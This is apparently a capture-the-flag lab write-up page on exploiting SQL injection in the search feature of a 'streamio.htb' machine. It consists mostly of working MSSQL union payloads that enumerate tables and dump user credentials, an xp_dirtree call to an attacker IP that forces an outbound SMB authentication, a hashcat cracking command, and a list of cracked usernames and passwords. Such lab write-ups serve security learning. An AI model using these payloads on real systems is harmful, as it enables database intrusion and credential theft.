SQL Injection

https://watch.streamio.htb/search.phpwatch.streamio.htb
2012
'and 1=1-- -
Select name, year, URL from movedb where q == 'snatch'
q=%
Select * from movies where name like '%fast%'
Select * from movies where name like '%fast%'-- -%'
q=fast%'-- -
q=fast'union select 1,2,3,4,5,6-- -
q=fast'union select 1,(select @@version),3,4,5,6-- -
q=fast'; exec xp_dirtree '\\10.10.14.6\adot8';-- -
q=fast'union select 1,name,id,4,5,6 from streamio..sysobjects where xtype='u'-- -
q=fast'union select 1,(select string_agg(name, '|') from streamio..syscolumns where id='901578250'),3,4,5,6-- -
q=fast'union select 1,(select string_agg(concat(username,':',password), '|') from users),3,4,5,6-- -
hashcat -m 0 --user dump.hash ~/rockyou.txt --show
Lauren:##123a8j8w5123##
Sabrina:!!sabrina$
Thane:highschoolmusical
Barry:$hadoW
Michelle:!?Love?!123
Victoria:!5psycho8!
Clara:%$clara
Lenord:physics69i
Juliette:$3xybitch
Bruno:$monique$1991$
yoshihide:66boysandgirls..
admin:paddpadd
PreviousExploit ChainNextLoggin into application

Last updated

Was this helpful?